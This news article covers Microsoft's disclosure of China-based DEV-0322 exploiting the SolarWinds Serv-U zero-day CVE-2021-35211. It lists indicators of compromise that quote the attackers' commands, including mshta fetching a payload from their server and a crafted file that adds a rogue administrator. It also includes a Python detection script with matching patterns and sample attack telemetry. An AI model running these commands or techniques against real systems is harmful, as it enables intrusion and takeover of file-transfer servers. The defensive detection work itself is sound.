Microsoft said on Tuesday that hackers operating in China exploited a zero-day vulnerability in a SolarWinds product. According to Microsoft, the hackers most likely targeted software companies and the US defense industry.
SolarWinds revealed the zero-day on Monday, after Microsoft notified the company that it had discovered a previously unknown vulnerability in the SolarWinds Serv-U product line under active exploitation. Austin, Texas-based SolarWinds gave no details about the threat actor behind the attacks or how the attacks worked.
Commercial VPNs and compromised consumer routers
On Tuesday, Microsoft said it currently tracks the hacking group under the temporary designation “DEV-0322.”
“MSTIC has observed DEV-0322 targeting US Defense Industrial Base Sector devices and software companies,” researchers from the Microsoft Threat Intelligence Center wrote in a post. “This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in the attacker infrastructure.”
In addition to the three attacker-related servers already disclosed by SolarWinds, Microsoft provided the following additional indicators that people can use to determine whether they have been hacked. The indicators of compromise are:
- hxxp://144[.]34[.]179[.]162/a
- C:\Windows\Temp\Serv-U.bat
- C:\Windows\Temp\test\current.dmp
- The presence of suspicious exception errors, especially in the DebugSocketLog.txt log file
- C:\Windows\System32\mshta.exe http://144[.]34[.]179[.]162/a (defanged)
- cmd.exe /c whoami > "./Client/Common/redacted.txt"
- cmd.exe /c dir > ".\Client\Common\redacted.txt"
- cmd.exe /c "C:\Windows\Temp\Serv-U.bat"
- powershell.exe C:\Windows\Temp\Serv-U.bat
- cmd.exe /c type \\redacted\redacted.Archive > "C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\redacted.Archive"
Tuesday’s post also provided new technical details about the attack. Specifically:
We observed that DEV-0322 redirected the output of their cmd.exe commands to files in the Serv-U \Client\Common\ folder, which is accessible from the Internet by default, so that the attackers could retrieve the results of the commands. The actor was also seen adding a new global user to Serv-U, effectively adding themselves as a Serv-U administrator, by manually creating a crafted .Archive file in the Global Users directory. Serv-U user information is stored in these archive files.
Due to the way DEV-0322 had written their code, when the exploit successfully compromises the Serv-U process, an exception is generated and logged to a Serv-U log file, DebugSocketLog.txt. The process could also crash after a malicious command was run.
By reviewing telemetry, we identified features of the exploit, but not a root-cause vulnerability. MSTIC worked with the Microsoft Offensive Security Research team, which performed vulnerability research on the Serv-U binary and identified the vulnerability through black-box analysis. Once a root cause was found, we reported the vulnerability to SolarWinds, which responded quickly to understand the issue and build a patch.
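The indicators and behaviours above can be turned into a quick triage check for a Serv-U host. The following is an added example, not code from Microsoft or SolarWinds: it assumes a responder has already exported process-creation events (for example Sysmon Event ID 1 records with a CommandLine field), a copy of DebugSocketLog.txt, and a listing of the Serv-U "Global Users" directory, and it flags the published command-line patterns, exception lines in the log, and .Archive files that do not correspond to a known user. The sample events, log lines and user names are constructed; the DebugSocketLog.txt line format is an assumption, since the article does not show it.

```python
"""Triage check for the DEV-0322 / Serv-U indicators described in the article.

Added example, not code from Microsoft or SolarWinds. Inputs are assumed to have
been exported from the Serv-U host already: process-creation events as dicts
with a "CommandLine" field, the text of DebugSocketLog.txt, and the file names
found in the Serv-U "Global Users" directory.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Iterable

# Indicators published in the article. The IP is written undefanged here because
# that is how it appears in real telemetry.
C2_HOST = "144.34.179.162"
DROPPED_FILES = (
    r"c:\windows\temp\serv-u.bat",
    r"c:\windows\temp\test\current.dmp",
)

# Behaviours from Microsoft's write-up, matched as patterns rather than exact
# strings so the redacted file names in the published IOCs do not matter:
#  - cmd.exe output redirected into the Internet-reachable Client\Common folder
#  - mshta.exe fetching a remote URL (the published command pulled /a from the C2)
#  - anything written under Global Users as a .Archive (adds a Serv-U user)
REDIRECT_TO_CLIENT_COMMON = re.compile(r'>\s*"?\.?[\\/]?client[\\/]common[\\/]', re.I)
MSHTA_REMOTE = re.compile(r"mshta\.exe\s+https?://", re.I)
ARCHIVE_WRITE = re.compile(r'global users\\[^"]*\.archive', re.I)
EXCEPTION_LINE = re.compile(r"exception", re.I)


@dataclass(frozen=True)
class Hit:
    rule: str
    evidence: str


def scan_command_line(cmdline: str) -> list[Hit]:
    """Return every rule the command line trips (one command may trip several)."""
    hits = []
    lowered = cmdline.lower()
    if C2_HOST in lowered:
        hits.append(Hit("c2_host", cmdline))
    if any(path in lowered for path in DROPPED_FILES):
        hits.append(Hit("dropped_file", cmdline))
    if REDIRECT_TO_CLIENT_COMMON.search(cmdline):
        hits.append(Hit("output_to_client_common", cmdline))
    if MSHTA_REMOTE.search(cmdline):
        hits.append(Hit("mshta_remote", cmdline))
    if ARCHIVE_WRITE.search(cmdline):
        hits.append(Hit("global_users_archive_write", cmdline))
    return hits


def scan_process_events(events: Iterable[dict]) -> list[Hit]:
    hits = []
    for event in events:
        hits.extend(scan_command_line(event.get("CommandLine", "")))
    return hits


def scan_debug_socket_log(text: str) -> list[Hit]:
    """Microsoft said a successful exploit leaves exceptions in DebugSocketLog.txt;
    surface every line mentioning one for an analyst to review."""
    return [Hit("debugsocketlog_exception", line.strip())
            for line in text.splitlines() if EXCEPTION_LINE.search(line)]


def unexpected_archives(archive_names: Iterable[str], known_users: Iterable[str]) -> list[str]:
    """Serv-U keeps each global user as <name>.Archive; report archives whose
    name is not an account the administrators recognise."""
    known = {user.lower() for user in known_users}
    suffix = ".archive"
    return sorted(
        name for name in archive_names
        if name.lower().endswith(suffix) and name[: -len(suffix)].lower() not in known
    )


# Constructed sample telemetry modelled on the published command lines; the
# DebugSocketLog.txt lines are invented, as the article does not show its format.
SAMPLE_EVENTS = [
    {"CommandLine": r'cmd.exe /c whoami > "./Client/Common/out.txt"'},
    {"CommandLine": r"C:\Windows\System32\mshta.exe http://144.34.179.162/a"},
    {"CommandLine": r"powershell.exe C:\Windows\Temp\Serv-U.bat"},
    {"CommandLine": r'cmd.exe /c type \\10.0.0.9\share\acct.Archive > "C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\acct.Archive"'},
    {"CommandLine": r"C:\Program Files\RhinoSoft\Serv-U\Serv-U.exe"},  # benign
]
SAMPLE_DEBUG_SOCKET_LOG = """\
[01] Socket 1290 connected from 203.0.113.5:51000
[01] Socket 1290 EXCEPTION: unhandled error in SSH handler
[01] Socket 1291 connected from 203.0.113.5:51002
"""
SAMPLE_ARCHIVES = ["alice.Archive", "bob.Archive", "ftpadmin.Archive"]
SAMPLE_KNOWN_USERS = ["alice", "bob"]

if __name__ == "__main__":
    for hit in scan_process_events(SAMPLE_EVENTS) + scan_debug_socket_log(SAMPLE_DEBUG_SOCKET_LOG):
        print(f"{hit.rule:28} {hit.evidence}")
    print("unexpected Global Users archives:", unexpected_archives(SAMPLE_ARCHIVES, SAMPLE_KNOWN_USERS))
```

The command-line rules deliberately key on behaviour (redirection into Client\Common, mshta.exe with a URL, writes into Global Users) rather than the exact published strings, since the attacker can rename output files freely; the C2 address and dropped-file paths are kept as exact matches. Any hit from the Global Users check should be confirmed against the Serv-U administrator's own list of accounts before being treated as an intrusion.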
The zero-day vulnerability, tracked as CVE-2021-35211, lies in SolarWinds’ Serv-U product, which customers use to transfer files across networks. When the Serv-U SSH service is exposed to the Internet, successful exploitation lets attackers run malicious code remotely with elevated system privileges. From there, attackers can install and run malicious payloads, or view and modify data.
SolarWinds became a household name overnight in late December, when researchers discovered that it was at the center of a supply-chain attack of global reach. After compromising SolarWinds’ software build system, the attackers used their access to push a malicious update to approximately 18,000 customers of the company’s Orion network management tool.
Of those 18,000 customers, about nine US government agencies and roughly 100 private companies received follow-on malware. The federal government has attributed the attacks to Russia’s foreign intelligence service, abbreviated SVR. For more than a decade, the SVR has been conducting malicious campaigns targeting governments, political think tanks and other organizations around the world.
The zero-day attacks that Microsoft discovered and reported have nothing to do with the Orion supply chain attack.
SolarWinds patched the vulnerability over the weekend. Anyone running a vulnerable version of Serv-U should update immediately and check for signs of compromise.